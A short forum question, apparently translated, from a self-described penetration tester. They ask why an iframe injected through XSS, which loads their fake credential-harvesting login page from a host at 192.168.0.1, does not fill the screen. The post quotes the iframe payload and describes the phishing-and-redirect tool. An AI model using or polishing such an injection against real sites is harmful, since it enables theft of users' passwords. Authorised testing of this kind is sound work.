我正在研究XSS攻击,目的是在客户端演示中使用它们(我是笔测试者).我已经编写了一个工具,它会托管恶意版本的网站的登录页面(收获用户名和密码),然后将受害者重定向到原始网站.不过,我一直在努力使用iframe来使用它,因为它看起来更有说服力,因为url不会改变.
我已经google了,这似乎是适当的代码:
<iframe src="http://192.168.0.1/login.PHP" style="border: 0; width: 100%; height: 100%">
但是创建的iframe绝对不是全屏幕(在Internet Explorer和Firefox上).这是一个截图
如您所见,iframe登录页面位于“您的名字”之下?区域,因此没有附近全屏幕.我已经尝试编辑恶意登录页面的css文件,以包括全屏参数,但是这也没有效果.
有没有人有任何解决方案?谢谢!
